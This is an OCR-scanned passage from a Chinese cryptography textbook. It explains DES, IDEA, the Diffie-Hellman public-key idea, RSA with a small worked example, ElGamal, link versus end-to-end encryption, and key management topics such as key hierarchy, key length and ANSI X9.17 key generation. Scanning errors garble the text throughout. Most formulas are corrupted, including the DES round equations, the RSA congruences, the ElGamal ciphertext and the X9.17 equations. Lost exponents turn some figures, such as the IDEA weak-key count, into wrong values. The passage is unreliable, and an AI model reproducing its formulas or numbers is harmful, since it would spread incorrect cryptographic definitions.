每 轮 编码 时 ， 一 个 48 比特 的 “ 轮 ” 密 钥 值 由 56 比特 的 完整 密 钥 推导 出 来 。 再 经 过 16 轮 的 
迭代 、 乘 积 变换 、 压 缩 变 换 等 ， 输 出 64 比特 的 密 文 。DES 算法 的 安全 性 完全 依赖 于 密 钥 。 

DES 的 运算 可 描述 为 以 下 三 步 。 

(1) 对 输入 分 组 进行 固定 的 “初始 置换 ”了 瑟 ， 可 以 将 这 个 初始 置换 写 为 (Zu,R) 二 卫 
(Input Blochk)。 

这 里 ZL 和 RR 都 是 32 比特 的 分 组 。 注 意 到 IP 是 固定 的 函数 (也 就 是 说 ， 输 入 密 钥 不 是 
它 的 参数 )， 是 公开 的 ， 因 此 这 个 初始 置换 的 密码 意义 不 大 。 

(2) 将 下 面 的 运算 迭代 16 轮 (二 1,2,…,16)， 即 

LOR, 
ReL,®f(R,,k) 

这 里 大 为 “ 轮 密 钥 ”， 它 是 56 比特 输入 密 钥 的 一 个 48 比特 的 子 串 ; f 为 “S 盒 函 数 ” 
(S 表示 代 换 )， 是 一 个 代 换 密码 。 这 个 运算 的 特点 是 交换 两 半分 组 ， 就 是 说 ， 一 轮 的 左 
半分 组 输入 是 上 一 轮 的 右 半分 组 输出 。 交 换 运 算是 一 个 简单 的 换 位 密码 ， 目 的 是 获得 很 大 
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程度 的 “信息 扩散 ”。DES 的 这 一 步 是 代 换 密码 和 换 位 密码 的 结合 。 

(3) 将 16 轮 和 迭代 后 得 到 的 结果 (Z。,R。) 输入 到 了 P 的 逆 置 换 来 消除 初始 置换 的 影响 ， 这 

一 步 的 输出 就 是 DES 算法 的 输出 ， 将 最 后 一 步 写 为 
Output Block <— 了 (RDo) 

需 特别 注意 JP 的 输入 : 在 输入 IP- 以 前 ，16 轮 和 迭代 输出 的 两 个 半分 组 又 进行 了 一 次 
交换 。 加 密 和 解密 算法 都 用 这 3 个 步骤 ， 仅 有 的 不 同 就 是 如 果 加 密 算法 中 使 用 的 轮 密 钥 是 
太太 ,4 ,ss， 那 么 解密 算法 中 使 用 的 轮 密 钥 就 应 当 是 大 ,4 , 厂 ， 这 种 排列 轮 密 钥 的 方法 
称 为 “ 密 钥 表 ”， 记 为 (用 , 尼 ,4 ,ki )=(h6,hs,4 ,后 ) 。 

2) 国际 数据 加 密 算法 (IDEA) 

IDEA 数据 加 密 算法 是 由 瑞士 的 两 位 科学 家 于 1990 年 联合 提出 的 ， 它 的 明文 和 密 文 都 
是 64 比特 ， 但 密 钥 长 为 128 比特 。IDEA 是 作为 迭代 的 分 组 密码 实现 的 ， 使 用 128 比特 的 
密 钥 和 8 个 循环 。 这 比 DES 提供 了 更 多 的 安全 性 ， 但 是 在 选择 用 于 IDEA 的 密 钥 时 ， 应 该 
排除 那些 称 为 “ 弱 密 钥 ” 的 密 钥 。DES 只 有 4 个 弱 密 钥 和 12 个 次 弱 密 钥 ， 而 IDEA 中 的 
弱 密 钥 数 相当 可 观 ， 有 23 个 。 但 是 ， 如 果 密 钥 的 总 数 非常 大 ， 达 到 2 个 ， 那 么 仍 有 27 
个 密 钥 可 供 选择 。IDEA 被 认为 是 极为 安全 的 。 使 用 128 比特 的 密 钥 ， 暴 力 攻击 中 需要 进 
行 的 测试 次 数 与 DES 相 比 会 明显 增 大 ， 甚 至 允许 对 弱 密 钥 测试 。 

解密 密 钥 必 须 和 加 密 密 钥 相同 是 对 称 密 钥 算法 的 一 个 弱点 ， 这 就 产生 了 如 何 安全 地 分 
发 密 钥 的 问题 。 传 统 上 是 由 一 个 中 心 密 钥 生成 设备 产生 一 个 相同 的 密 钥 对 ， 并 由 人 工 信 使 
将 其 传送 到 各 自 的 目的 地 。 对 于 一 个 拥有 许多 部 门 的 组 织 来 说 ， 这 种 分 发 传送 方式 是 不 能 
令 人 满意 的 ， 尤 其 是 出 于 安全 方面 的 考虑 需要 经 常 更 换 密 钥 时 更 是 如 此 。 此 外 ， 两 个 完全 
陌生 的 人 要 想 秘 密 通 信 ， 就 必须 通过 实际 会 面 来 商定 密 钥 ， 否 则 别 无 他 法 。1976 年 ，Diffie 
和 Hellman 提出 了 一 种 全 新 的 加 密 思 想 一 一 公开 密 钥 算法 ， 很 好 地 解决 了 这 个 问题 。 


2.1.4” 公 和 钥 密码 体制 


非 对 称 加 密 算法 也 称 公 钥 加 密 算法 ， 它 的 特点 是 使 用 了 两 个 密 钥 ， 一 个 密 钥 公开 ， 一 
个 密 钥 保密 ， 只 有 两 者 搭配 使 用 才能 完成 加 密 和 解密 的 全 过 程 。 公 开 密 钥 加 密 最 初 是 由 
Diffie 和 Hellman 在 1976 年 提出 的 ， 这 是 几 千年 来 文字 加 密 的 第 一 次 真正 革命 性 的 进步 。 
公 钥 是 建立 在 数学 函数 基础 上 ， 而 不 是 建立 在 位 方式 的 操作 上 。 更 重要 的 是 ， 公 钥 加 密 是 
不 对 称 的 ， 与 只 使 用 一 种 密 钥 的 对 称 常规 加 密 相 比 ， 它 涉及 公 钥 和 私 钥 的 使 用 。 这 两 种 密 
钥 的 使 用 已 经 对 机 密 性 、 密 钥 的 分 发 和 身份 验证 领域 产生 了 深远 的 影响 。 公 钥 加 密 算法 可 
用 于 数据 完整 性 、 数 据 保密 性 、 发 送 者 不 可 否认 和 发 送 者 认证 等 方面 。 

1. Diffie-Hellman 公 钥 思想 


在 公开 密 钥 算法 提出 之 前 ， 所 有 密码 系统 的 解密 密 钥 和 加 密 密 钥 都 有 很 直接 的 联系 ， 
即 从 加 密 密 钥 可 以 很 容易 地 导出 解密 密 钥 ， 因 此 所 有 的 密码 学 家 理所当然 地 认为 应 对 加 密 
密 钥 进行 保密 。 但 是 Diffie 和 Hellman 提出 了 一 种 完全 不 同 的 设想 ， 从 根本 上 改变 了 人 们 
研究 密码 系统 的 方式 。 在 Diffie 和 Hellman 提出 的 方法 中 ， 加 密 密 钥 和 解密 密 钥 是 不 同 
的 ， 并 且 从 加 密 密 钥 不 能 得 到 解密 密 钥 。 为 此 ， 加 密 算法 E 和 解密 算法 D 必须 满足 以 下 3 
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个 条 件 。 

© DECD)=P。 

@) 从 E 导 出 DD 非常 困难 。 

@ 由 一 段 明 文 不 可 能 破译 出 E。 

第 一 个 条 件 是 指 将 解密 算法 D 作用 于 密 文 E(P) 后 就 可 获得 明文 P; 第 二 个 条 件 是 说 不 
可 能 从 EE 导出 D; 第 三 个 条 件 是 指 破译 者 即使 能 加 密 任意 一 段 明 文 ， 也 无 法 破译 密码 。 如 
果 能 够 满足 以 上 3 个 条 件 ， 则 加 密 算法 完全 可 以 公开 。 

Diffie 和 Hellman 算法 的 基本 思想 : 如果 某 个 用 户 希 望 接收 秘密 报 文 ， 他 必须 设计 两 
个 算法 ， 即 加 密 算法 E 和 解密 算法 D， 然 后 将 加 密 算 法 放 于 任何 一 个 公开 的 文件 中 广 而 告 
之 ， 这 也 是 公开 密 钥 算法 名 称 的 由 来 ， 他 甚至 也 可 以 公开 他 的 解密 方法 ， 只 要 他 妥善 保存 
解密 密 钥 即 可 。 当 两 个 完全 陌生 的 用 户 A 和 B 希望 进行 秘密 通信 时 ， 各 自 可 以 从 公开 的 文 
件 中 查 到 对 方 的 加 密 算法 ; 若 A 需要 将 秘密 报 文 发 给 B， 则 A 用 B 的 加 密 算法 E, 对 报 文 
进行 加 密 ， 然 后 将 密 文 发 给 B，B 使 用 解密 算法 D, 进行 解密 ， 而 除 B 以 外 的 任何 人 都 无 
法 读 懂 这 个 报 文 ， 当 B 需要 向 人 发 送 消息 时 ，B 使 用 A 的 加 密 算法 E 对 报 文 进行 加 密 ， 
然后 发 给 A，A 利用 DD, 进行 解密 。 

在 这 种 算法 中 ， 每 个 用 户 都 使 用 两 个 密 钥 ， 其 中 加 密 密 钥 是 供 其 他 人 发 送 报 文 用 的 ， 
这 是 公开 的 ;解密 密 钥 是 用 于 对 收 到 的 密 文 进行 解密 的 ， 这 是 保密 的 。 通 常用 公开 密 铀 和 
私人 密 钥 分 别称 呼 公开 密 钥 算法 中 的 加 密 密 铀 和 解密 密 钥 ， 以 同 传统 密码 学 中 的 秘密 密 钥 
相 区 分 。 由 于 私人 密 钥 只 由 用 户 自 己 掌握 ， 不 需要 分 发 给 别人 ， 也 就 不 用 担心 在 传输 过 程 
中 或 被 其 他 用 户 泄 密 ， 因 而 是 极其 安全 的 。 用 公开 密 钥 算法 解决 上 面 所 说 的 密 钥 分 发 问题 
非常 简单 ， 中 心 密 钥 生 成 设备 产生 一 个 密 钥 后 ， 用 各 个 用 户 公开 的 加 密 算法 对 之 进行 加 
密 ， 然 后 分 发 给 各 用 户 ， 各 用 户 再 用 自己 的 私人 密 钥 进行 解密 ， 既 安全 又 省 事 。 两 个 完全 
陌生 的 用 户 之 间 也 可 以 使 用 这 种 方法 方便 地 商定 一 个 秘密 的 会 话 密 钥 。 


2. 公 钥 密码 体制 框图 


非 对 称 加 密 算法 中 ， 每 个 加 密 者 有 公 钥 PK 和 相对 应 的 私 钥 SK。 在 具体 算法 中 ， 给 定 
PK 来 计算 SK 在 计算 上 是 不 可 行 的 。 公 钥 定 义 了 加 密 变 换 E£， 私 钥 定 义 了 相应 的 解密 变换 
D。 该 算法 的 最 大 优点 是 提供 可 信 公 钥 比 在 对 称 加 密 算法 中 安全 分 发 秘密 密 钥 通常 要 容 
易 。 非 对 称 加 密 算法 包含 两 个 实体 ， 即 发 送 方 A 和 接收 方 B， 其 加 密 过 程 包 含 以 下 步骤。 

(1) 产生 一 对 用 于 加 密 和 解密 的 密 钥 ， 如 图 2.3 中 产生 接收 方 B 的 一 对 密 钥 (PK,SK)， 
其 中 PK 是 公开 的 ，SK 是 保密 的 。 

(2) 接收 方 公开 加 密 密 钥 PK， 保密 存储 SK。 

(3) 发 送 方向 B 发 送 消 息 ， 则 使 用 B 的 公 钥 加 密 消息 m， 记 作 c=Epk(m)， 其 中 c 是 密 
文 , 是 加 密 变换 。 

(4) 接收 方 收 到 密 文 c 后 ， 使 用 自己 的 私 钥 SK 解密 ， 记 作 m=Epg(c)， 其 中 D 是 解密 
变换 。 
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发 送 方 A 接收 方 B 


图 2.3 ” 公 钥 密码 体制 框图 


3. RSA 


RSA 是 1978 年 由 RRivest、A.Shamir 和 L.Adleman 共同 提出 ， 以 发 明 者 的 名 字 命 
名 。RSA 算法 基于 数论 的 整数 因子 分 解 问题 的 困难 性 构造 得 出 ， 是 第 一 个 公 钥 密码 的 实际 
实现 。 在 RSA 算法 中 使 用 两 个 密 钥 ， 密 钥 生 成 中 的 整数 e 和 q 分 别称 为 加 密 指数 和 解密 指 
数 ，n 称 为 模 数 。RSA 算法 如 下 。 

为 了 帮助 理解 上 述 RSA 算法 ， 考 虑 以 下 一 个 例子 。 

算法 2.1 RSA 密码 体制 

密 钥 生成 算法 : 为 了 生成 用 户 的 基本 参数 。 用 户 Alice 执行 以 下 步 又。 

(1) 随机 选择 两 个 素数 p 和 g， 满 足 pl=lql， 计算 n=pg 和 9 (n)=(p-1)(q-1)。 

(2) 随机 选择 整数 1<e< y(n)， 满足 gcd(e, 9 (nm))=1， 并 使 用 扩展 的 欧 几 里 得 算法 计算 
满足 的 唯一 整数 4 满足 ed(mod 9 (n=1)。 

(3) 公开 她 的 公 钥 (n,e)， 安 全 地 销毁 p、g 和 9% (n)， 并 保留 4 作为 她 的 私 钥 。 

加 密 算法 : 加 密 时 ， 首 先 将 明文 比特 串 分 组 ， 使 得 每 个 分 组 m 对 应 的 十 进 制 数 在 区 间 
[0.n-1]， 即 分 组 长 度 小 于 logzn， 对 每 个 明文 分 组 m 计 算 c = memod n， 并 将 密 文 c 发 送 给 
接收 者 。 为 了 秘密 地 将 m(m<n) 发 送 给 Alice， 发 送 者 Bob 生成 密 文 c 为 

cm’ modn 

解密 算法 : 为 了 解密 密 文 c，Alice 计算 为 

m<-c’(modn) 

假设 取 p=3、g=11， 则 计算 出 n=33 和 z=20。 由 于 7 和 20 没有 公 因 子 ， 因 此 可 取 
4=7; 解 方 程 7e(mod 20)=1 可 以 得 到 e=3。 由 此 公开 密 钥 为 (3,33)， 私 人 密 钥 为 (7,33)。 假 设 
要 加 密 的 明文 为 M=4， 则 C=Metmod nn)=4*(mod 33)=31， 于 是 对 应 的 密 文 为 C=31。 接 收 方 
收 到 密 文 后 进行 解密 ， 计 算 M=C? (mod n)=31 (mod 33)=4， 恢 复出 原文 。 

应 该 指出 的 是 ， 与 对 称 密码 体制 如 DES 相 比 ， 虽 然 RSA 算法 具有 安全 方便 的 特点 ， 
但 它 的 运行 速度 太 慢 ， 因 此 ，RSA 体制 很 少 用 于 数据 加 密 ， 而 多 用 在 数字 签名 、 密 钥 管理 
和 认证 等 方面 ， 数 据 的 加 密 仍 使 用 秘密 密 钥 算法 。 

4. EIGamal 算法 


1985 年 ，ElGamal 基于 离散 对 数 困 难 问题 构造 了 ElGamal 公 钥 体制 ， 其 中 密 文 不 仅 依 
赖 于 待 加密 的 明文 ， 而 且 依 赖 于 用 户 选 择 的 随机 参数 ， 即 使 加 密 相同 的 明文 ， 得 到 的 密 文 
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也 是 不 同 的 。 由 于 这 种 加 密 算法 的 非 确实 性 ， 又 称 其 为 概率 加 密 体制 。 在 确定 性 加 密 算法 
中 ， 如 果 破 译 者 对 某 些 关键 信息 感 兴趣 ， 则 他 可 事先 将 这 些 信 息 加 密 后 存储 起 来 ， 一 旦 以 
后 截获 密 文 ， 就 可 以 直接 在 存储 的 密 文中 进行 查找 ， 从 而 求 得 相应 的 明文 。 概 率 加 密 体制 
弥补 了 这 种 不 足 ， 提 高 了 安全 性 。 

与 既 能 作 公 钥 加 密 又 能 作 数字 签名 的 RSA 不 同 ，ElGamal 签名 体制 是 在 1985 年 仅 为 
数字 签名 而 构造 的 签名 体制 。NIST 采用 修改 后 的 EIGamal 签名 体制 作为 数字 签名 体制 标 
准 。 破 译 EIGamal 签名 体制 等 价 于 求解 离散 对 数 问题 。 

此 外 ， 背 包公 钥 体 制 是 1978 年 由 Merkle 和 Hellman 提出 的 。 背 包 算 法 的 思路 是 假定 
某 人 拥有 大 量 的 物品 ， 重 量 各 不 相同 。 此 人 通过 秘密 地 选择 一 部 分 物品 并 将 它们 放 到 背包 
中 来 加 密 消息 。 背 包 中 的 物品 总 重量 是 公开 的 ， 所 有 可 能 的 物品 也 是 公开 的 ， 但 背包 中 的 
物品 却 是 保密 的 。 附 加 一 定 的 限制 条 件 ， 给 出 重量 ， 而 要 列 出 可 能 的 物品 ， 在 计算 上 是 不 
可 实现 的 。 这 就 是 公开 密 钥 算 法 的 基本 思想 。 大 多 数 公 钥 密码 体制 都 会 涉及 高 次 容 运 算 ， 
不 仅 加 密 速度 慢 ， 而 且 会 占用 大 量 的 存储 空间 。 背 包 问 题 是 熟知 的 不 可 计算 问题 ， 背 包 体 
制 以 其 加 密 、 解 密 速度 快 而 引 人 注 目 。 但 是 ， 大 多 数 一 次 背包 体制 均 被 破译 了 ， 因 此 很 少 
有 人 使 用 它 。 目 前 许多 商业 产品 采用 的 公 钥 算法 还 有 Diffie-Hellman 密 钥 交换 、 数 据 签名 
标准 DSS 和 椭圆 曲线 密码 转 术 等 。 

算法 2.2 ElGamal 密码 体制 

密 钥 生成 算法 ， 为 了 创建 用 户 的 密 钥 数据 ，Alice 执行 下 列 步骤 。 

(1) 随机 选择 素数 PP， 计算 到 的 一 个 随机 乘法 生成 元 。 

(2) 随机 选取 xev Z, ,作为 她 的 私 钥 ， 计 算 她 的 公 钥 ye-g*(mod p)。 


(3) 把 @, g,») 作 为 她 的 公开 密 钥 公开 ， 把 x 作为 她 的 私 钥 保 存 。 
加 密 算法 : 为 了 将 消息 m<p 秘密 地 发 送 给 Alice， 发 送 者 Bob 选取 ke, Z,,， 按 照 下 


列 运算 计算 密 文 对 (cu c2)， 即 


ca csgnodD) 
c ym(mod p) 
解密 算法 : 为 了 解密 (c1, c)，Alice 计算 为 


me-c,/c (modp) 
2.1.5 ”密码 学 技术 在 网 络 中 的 应 用 


加 密 技术 用 于 网 络 安全 通常 有 两 种 形式 ， 即 面向 网 络 服务 和 面向 应 用 服务 。 

向 网 络 服务 的 加 密 技 术 工作 在 网 络 层 或 传输 层 ， 使 用 经 过 加 密 的 数据 包 传送 、 认 证 
网 络 路 由 以 及 其 他 网 络 协议 所 需 的 信息 ， 从 而 保证 网 络 的 连通 性 和 可 用 性 不 受 损害 。 在 网 
络 层 上 实现 的 加 密 技 术 对 于 网 络 应 用 层 的 用 户 而 言 是 透明 的 。 此 外 ， 通 过 适当 的 密 钥 管 理 
机 制 ， 使 用 这 一 方法 还 可 以 在 公用 网 络 上 建立 虚拟 专用 网 络 ， 并 保障 其 信息 安全 性 。 

向 应 用 服务 的 加 密 技 术 是 目前 较为 流行 的 加 密 技术 ， 如 使 用 Kerberos 服务 的 
Telnet、NFS、Rlogin 等 以 及 用 作 电 子 邮件 加 密 的 PEM(Privacy Enhanced Mail， 隐 私 增强 邮 
件 ) 和 PGP(Pretty Good Privacy， 良 好 隐私 ) 技 术 。 这 一 类 加 密 技术 实现 起 来 相对 较为 简单 ， 
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不 需要 对 电子 信息 (数据 包 ) 所 具有 的 网 络 安全 性 能 提出 特殊 要 求 ， 对 电子 邮件 数据 实现 端 
到 端的 安全 保障 。 

从 通信 网 络 的 传输 方面 ， 数 据 加 密 技 术 还 可 分 为 以 下 3 类 ， 即 链 路 加 密 方 式 、 节 点 到 
节点 加 密 方 式 和 端 到 端 加 密 方 式 。 

(1) 链 路 加 密 方式 是 普通 网 络 通信 安全 主要 采用 的 方式 。 它 不 但 对 数据 报 文 的 正文 进 
行 加 密 ， 而 且 把 路 由 信息 、 校 验 码 等 控制 信息 全 部 加 密 。 所 以 ， 当 数据 报 文 到 某 个 中 间 节 
点 时 ， 必 须 被 解密 以 获得 路 由 信息 和 校 验 码 ， 进 行路 由 选择 、 差 错 检 测 ， 然 后 才能 被 加 密 
发 送 到 下 一 个 节点 ， 直 到 数据 报 文 到 达 目 的 节点 为 止 。 

(2) 节点 到 节点 加 密 方式 是 为 了 解决 在 节点 中 数据 明文 传输 的 缺点 ， 在 中 间 节 点 里 装 
有 加 、 解 密 的 保护 装置 ， 由 这 个 装置 来 完成 一 个 密 钥 向 另 一 个 密 钥 的 交换 。 因 而 ， 除 了 在 
保护 装置 内 ， 即 使 在 节点 内 也 不 会 出 现 明文 。 但 是 这 种 方式 和 链 路 加 密 方式 一 样 需要 公共 
网 络 提供 者 配合 ， 修 改 他 们 的 交换 节点 ， 增 加 安全 单元 或 保护 装置 。 

(3) 在 端 到 端 加 密 方 式 中 ， 由 发 送 方 加 密 的 数据 在 没有 到 达 最 终 目 的 节点 之 前 是 不 被 
解 破 的 ， 加 、 解 密 只 在 源 、 宿 节点 进行 ， 因 此 ， 这 种 方式 可 以 按 各 种 通信 对 象 的 要 求 改变 
加 密 密 钥 以 及 按 应 用 程序 进行 密 钥 管理 等 ， 而 且 采 用 这 种 方式 可 以 解决 文件 加 密 问题 。 

链 路 加 密 方式 和 端 到 端 加 密 方式 的 区 别 是 ， 链 路 加 密 方 式 是 对 整个 链 路 的 通信 采取 保 
护 措施 ， 而 端 到 端 方 式 则 是 对 整个 网 络 系统 采取 保护 措施 。 因 此 ， 端 到 端 加 密 方式 是 未 来 
的 发 展 趋势 。 


2.2 密 钥 管理 


密 钥 管理 是 数据 加 密 技术 中 的 重要 一 环 ， 密 钥 管理 的 根本 意图 在 于 提高 系统 的 安全 保 
密 程度 。 一 个 良好 的 密 钥 管理 系统 ， 除 在 生成 与 分 发 过 程 中 尽量 减少 人 力 直接 干预 外 ， 还 
应 做 到 以 下 几 点 。 

(1) 密 钥 难以 被 非法 窃取 。 

(2) 在 一 定 条 件 下 ， 即 使 被 窃取 了 也 无 用 。 

(3) 密 钥 分 发 和 更 换 的 过 程 ， 对 用 户 是 透明 的 ， 用 户 不 一 定 亲 自 掌握 密 钥 。 

密 钥 是 加 密 运 算 和 解密 运算 的 关键 ， 也 是 密码 系统 的 关键 。 密 码 系统 的 安全 取决 于 密 
钥 的 安全 ， 而 不 是 密 钥 算法 或 保密 装置 本 身 的 安全 。 即 使 公开 了 密码 体制 ， 或 者 丢失 了 密 
码 设备 ， 同 一 型 号 的 加 密 设备 也 仍然 可 以 继续 使 用 ， 若 密 钥 一 旦 丢失 或 出 错 ， 就 会 被 非法 
用 户 窃取 信息 。 将 密 钥 泄露 给 他 人 意味 着 加 密 文 档 还 不 如 使 用 明文 ， 因 此 密 钥 管理 在 计算 
机 的 安全 保密 系统 的 设计 中 极为 重要 。 密 钥 管理 综合 了 密 钥 的 产生 、 分 发 、 存 储 、 组 织 、 
使 用 、 销 毁 等 一 系列 技术 问题 ， 同 时 也 对 行政 管理 和 人 员 素质 提出 了 要 求 。 


2.2.1 密 钥 的 分 类 和 作用 


在 同一 密码 系统 中 ， 为 保证 信息 和 系统 安全 ， 常 常 需要 多 种 密 钥 ， 每 种 密 钥 担负 相应 
的 任务 。 下 面 介绍 几 种 常用 的 密 钥 。 
(1) 初级 密 钥 。 把 保护 数据 (加 密 和 解密 ) 的 密 钥 叫 作 初 级 密 钥 (K)， 初 级 密 钥 又 叫 作 数 
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据 加 密 (数据 解密 ) 密 钥 。 当 初级 密 钥 直接 用 于 提供 通信 安全 时 ， 叫 作 初 级 通信 密 钥 (KC)。 
在 通信 会 话 期 间 用 于 保护 数据 的 初级 通信 和 密 钥 叫 会 话 密 钥 ， 但 初级 密 钥 用 于 直接 提供 文件 
安全 时 ， 叫 作 初级 文件 密 钥 (KF)。 

(2) 钥 加 密 钥 。 对 密 钥 进 行 保护 的 密 钥 称 为 钥 加 密 钥 ， 把 保护 初级 密 钥 的 密 钥 叫 作 二 
级 密 钥 (KN)， 同 样 可 以 分 为 二 级 通信 密 钥 (KNC) 和 二 级 文件 密 钥 (KNF)。 

(3) 主机 密 钥 。 一 个 大 型 的 网 络 系统 可 能 有 上 千 个 节点 或 端 用 户 ， 若 要 实现 全 网 互 
通 ， 每 个 节点 就 要 保存 用 于 与 其 他 节点 或 端 用 户 进行 通信 的 二 级 密 钥 和 初级 密 铀 ， 这 些 密 
钥 要 形成 一 张 表 保存 在 节点 (或 端 节点 的 保密 装置 ) 内 ， 若 以 明文 的 形式 保存 ， 有 可 能 会 被 
窃取 。 为 保证 它 的 安全 ， 通 常 还 需要 有 一 个 密 钥 对 密 钥 表 进 行 加 密 保 护 ， 此 密 钥 称 为 主机 
密 钥 或 主 控 密 钥 。 

(4) 其 他 密 钥 。 在 一 个 系统 中 ， 除 了 上 述 密 钥 外 ， 还 可 能 有 通 播 密 钥 、 共 享 密 钥 等 ， 
它们 也 有 各 自 的 用 途 。 


2.2.2 ” 密 钥 长 度 


密 钥 长 度 一 般 是 以 二 进 制 位 (bit， 比 特 ) 为 单位 ， 也 有 以 字 节 (Byte) 为 单位 的 ， 密 钥 的 长 
度 对 密 钥 的 强度 有 直接 的 影响 。 密 钥 的 长 度 涉及 两 个 问题 : 多 长 的 密 钥 才 适合 保密 通信 的 
要 求 ， 密 钥 系统 对 于 对 称 / 非 对 称 密 钥 长 度 的 匹配 问题 。 

1. 密 钥 长 度 的 要 求 

密 钥 长 度 的 要 求 与 信息 安全 需要 的 环境 有 关 ， 不 同 信 息 安 全 需要 对 于 对 称 / 非 对 称 密 钥 
尺度 的 要 求 。 由 于 计算 机 技术 和 密码 学 的 发 展 ， 密 钥 长 度 已 经 有 了 很 大 的 变化 ， 如 对 称 密 
钥 的 长 度 已 经 修改 为 128 一 192 比特 。 


2. 对 称 / 非 对 称 密 钥 长 度 的 匹配 


无 论 是 使 用 对 称 密 钥 算法 还 是 公开 密 钥 算法 设计 的 系统 ， 都 应 该 对 密 钥 长 度 有 具体 的 
要 求 ， 以 防止 穷 举 等 攻击 的 破译 。 穷 举 攻击 是 指 用 所 有 可 能 的 密 钥 空 间 中 的 密 钥 值 破译 加 
密 信息 。 因 此 ， 如 果 同 时 使 用 64 比特 的 对 称 密 钥 算法 和 384 比特 的 公开 密 钥 算法 是 没有 
什么 安全 意义 的 ， 如 果 和 希望 使 用 的 对 称 算法 的 密 钥 长 度 是 128 比特 ， 那 么 使 用 的 公开 算法 
的 密 钥 长 度 至 少 应 为 2304 比特 。 

为 什么 不 用 更 长 一 些 的 密 钥 呢 ? 当然 可 以 ， 但 必须 为 密 钥 变 长 所 需 计 算 时 间 付出 代 
价 。 通 常 ， 使 密 钥 足够 长 ， 而 计算 所 需 的 时 间 足 够 得。 诚然 ， 对 称 密 钥 和 公开 密 钥 就 密 钥 
长 度 的 比较 而 言 ， 使 用 对 称 密 钥 的 算法 在 实现 上 比 公开 密 钥 的 算法 要 快 很 多 ， 而 且 密 钥 长 
度 也 要 短 。 但 是 ， 公 钥 技 术 具 有 更 大 的 实际 使 用 效果 。 一 般 而 言 ， 应 该 选择 比 对称 密 钥 算 
法 更 安全 的 公开 密 钥 长 度 ， 因 为 公开 密 钥 算法 通常 持续 时 间 长 ， 而 且 可 保护 更 多 的 信息 。 


2.2.3 ” 密 钥 的 产生 技术 


1. 密 钥 的 随机 性 要 求 
密 钥 是 数据 保密 的 关键 ， 应 有 足够 的 方法 来 产生 密 钥 。 作 为 密 钥 的 一 个 基本 要 求 是 要 
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具有 良好 的 随机 性 。 

在 普通 的 非 密 码 应 用 场合 ， 人 们 只 要 求 所 产生 出 来 的 随机 数 呈 现 平衡 的 、 等 概率 的 分 
布 ， 而 不 要 求 它 的 不 可 预测 性 。 而 在 密码 技术 中 ， 特 别 是 在 密 钥 产生 技术 中 ， 不 可 预测 性 
成 了 随机 性 的 一 个 最 基本 要 求 ， 因 为 那些 虽然 能 经 受 随 机 统计 检验 但 很 容易 预测 的 序列 肯 
定 是 容易 被 攻破 的 。 


2. 产生 密 钥 


现代 通信 技术 中 需要 产生 大 量 的 密 钥 ， 以 分 配给 系统 中 的 各 个 节点 和 实体 ， 但 现 有 产 
生 密 钥 的 方式 很 难 适 应 大 量 密 钥 需求 的 现状 ， 因 此 实现 密 钥 产 生 的 自动 化 ， 不 仅 可 以 减轻 
人 工 产生 密 钥 的 工作 负担 ， 还 可 以 消除 人 为 因素 引起 的 泄密 。 

1) 密 钥 产生 的 硬件 技术 

噪声 源 技术 是 密 钥 产生 的 常用 方法 ， 因 为 噪声 源 的 功能 就 是 产生 二 进 制 的 随机 序列 或 
与 之 对 应 的 随机 数 ， 它 是 密 钥 产生 设备 的 核心 部 件 。 噪 声 源 的 另 一 个 功能 是 在 物理 层 加 密 
的 环境 下 进行 信息 填充 ， 使 网 络 能 够 防止 流量 分 析 。 噪 声 源 技术 还 被 用 于 某 些 身份 验证 技 
术 中 ， 如 在 对 等 实体 中 ， 为 防止 口令 被 窃取 常常 使 用 随机 应 答 技术 ， 这 时 的 提问 与 应 答 都 
是 由 噪声 控制 的 。 

噪声 源 的 随机 性 不 强 ， 就 会 给 破译 带 来 线索 ， 某 些 破译 方法 还 特别 依赖 于 加 密 者 使 用 
简单 的 或 容易 猜 出 的 密 铀 。 

噪声 源 输出 的 随机 数 序列 按照 产生 的 方法 可 以 分 为 以 下 几 种 。 

(1) 伪 随机 序列 。 伪 随机 序列 也 称 为 伪 码 ， 具 有 近似 随机 序列 (噪声 ) 的 性 质 ， 而 又 能 按 
一 定 规律 (周期) 产生 和 复制 的 序列 。 因 为 真正 的 随机 序列 是 只 能 产生 而 不 能 复制 的 ， 所 以 
称 其 是 “ 伪 ” 随 机 序列 。 通 常用 数学 方法 和 少量 的 种 子 密 钥 来 产生 。 伪 随机 序列 一 般 都 有 
良好 的 、 能 经 受理 论 检验 的 随机 统计 特性 。 常 用 的 伪 随 机 序列 有 m 序列 、M 序列 和 RS 
序列 。 

(2) 物理 随机 序列 。 这 是 用 热 噪声 等 方法 产生 的 随机 序列 。 实 际 的 物理 噪声 往往 要 受 
到 温度 、 电 源 、 电 路 特性 等 因素 的 制约 ， 其 统计 特性 常常 带 有 一 定 的 偏向 性 。 

(3) 准 随机 序列 。 这 是 用 数学 方法 和 物理 方法 相 结合 产生 的 随机 序列 ， 它 可 以 克服 两 
者 的 缺点 。 

2) 密 钥 产生 的 软件 技术 

X9.17CX9.17-1985) 是 金融 机 构 密 钥 管理 标准 ， 由 ANSI( 美 国 国家 标准 局 ) 标 准 定义 的 一 
种 产生 密 钥 的 方法 ， 如 图 2.4 所 示 。 


中 [天 
-中 -| 加密 | ~ 
J -| 加密 


图 2.4 ANSI X9.17 密 钥 产 生 的 过 程 
X9.17 标准 产生 密 钥 的 算法 是 三 重 DES， 该 算法 的 目的 并 不 是 产生 容易 记忆 的 密 钥 ， 
而 是 在 系统 中 产生 一 个 会 话 密 钥 或 是 伪 随 机 数 。 其 过 程 如 下 。 
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第 2 剖 罕 友 学 基础 相国 
假设 E(x) 表示 用 密 钥 天 对 比特 串 x 进行 的 三 重 DES 加 密 ，K 是 为 密 钥 发 生 器 保留 的 
一 个 特殊 密 钥 。W 是 一 个 秘密 的 64 位 种 子 ，7 是 一 个 时 间 标 记 。 和 欲 产 生 的 随机 密 钥 RR 可 
以 通过 下 面 的 两 个 算式 来 计算 ， 即 


R=E(E(T)®OV) 
V=E(E(T)OR) 
对 于 128 比特 或 192 比特 密 钥 ， 可 以 通过 上 法 生成 几 个 64 比特 的 密 钥 后 串 接 起 来 便 可 。 
3) 针对 不 同 密 钥 类 型 的 产生 方法 
(1) 主机 主 密 钥 的 产生 。 这 类 密 钥 通 常 要 用 如 撕 硬 币 、 骨 子 、 从 随机 数 表 中 选 数 等 随 
机 方式 产生 ， 以 保证 密 钥 的 随机 性 ， 避 免 可 预测 性 。 而 任何 机 器 和 算法 所 产生 的 密 钥 都 有 
